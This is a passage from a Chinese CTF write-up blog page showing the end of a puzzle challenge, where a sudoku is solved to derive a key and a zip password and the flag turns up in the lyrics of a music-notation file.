class="line"><span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">1</span> <span class="number">8</span> <span class="number">0</span> <span class="number">9</span> <span class="number">0</span> <span class="number">2</span></span><br><span class="line"><span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">0</span> <span class="number">9</span> <span class="number">7</span> <span class="number">4</span> <span class="number">6</span> <span class="number">0</span></span><br><span class="line"></span><br><span class="line">密文:</span><br><span class="line">efb851bdc71d72b9ff668bddd30fd6bd</span><br><span class="line">密钥:</span><br><span class="line">第一列九宫格从左到右从上到下</span><br></pre></td></tr></table></figure>

<p>在这个网站可以自动求解数独：<a class="foo" href="http://www.llang.net/sudoku/calsudoku.html" target="_blank">传送门</a></p>
<p>得到密钥<code>52693795149137</code>。</p>
<img src="http://img.kawhi.xyz/image-20200601185426514.png" style="high:80%;width:80%;" />

<p>然后求得压缩包密码<code>GG0kc.tf</code>，解压得到<code>逆光 vocal.ovex</code>文件。使用<code>Overture 5</code>打谱软件打开，在歌词里看到flag。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/05/12/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/" rel="prev" title="反序列化漏洞总结">
      <i class="fa fa-chevron-left"></i> 反序列化漏洞总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/06/17/DozerCTF/" rel="next" title="DozerCTF">
      DozerCTF <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%80%81%E5%85%AB%E5%B0%8F%E8%B6%85%E5%B8%82"><span class="nav-number">2.</span> <span class="nav-text">老八小超市</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CheckIN"><span class="nav-number">3.</span> <span class="nav-text">CheckIN</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#cve%E7%89%88%E7%AD%BE%E5%88%B0"><span class="nav-number">4.</span> <span class="nav-text">cve版签到</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#EZ%E4%B8%89%E5%89%91%E5%AE%A2-EzWeb"><span class="nav-number">5.</span> <span class="nav-text">EZ三剑客-EzWeb</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#EZ%E4%B8%89%E5%89%91%E5%AE%A2-EzNode"><span class="nav-number">6.</span> <span class="nav-text">EZ三剑客-EzNode</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Poke%CC%81mon"><span class="nav-number">7.</span> <span class="nav-text">Pokémon</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#code-obfuscation"><span class="nav-number">8.</span> <span class="nav-text">code obfuscation</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Harley-Quinn"><span class="nav-number">9.</span> <span class="nav-text">Harley Quinn</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Sail-a-boat-down-the-river"><span class="nav-number">10.</span> <span class="nav-text">Sail a boat down the river</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="kawhi"
      src="http://yuhaojiang.gitee.io/picture/Blog头像.jpg">
  <p class="site-author-name" itemprop="name">kawhi</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.tattooo.top/" title="https:&#x2F;&#x2F;www.tattooo.top" rel="noopener" target="_blank">Tattoo's Blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.plasf.cn/" title="https:&#x2F;&#x2F;www.plasf.cn&#x2F;" rel="noopener" target="_blank">Xiao Leung's Blog</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">kawhi</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
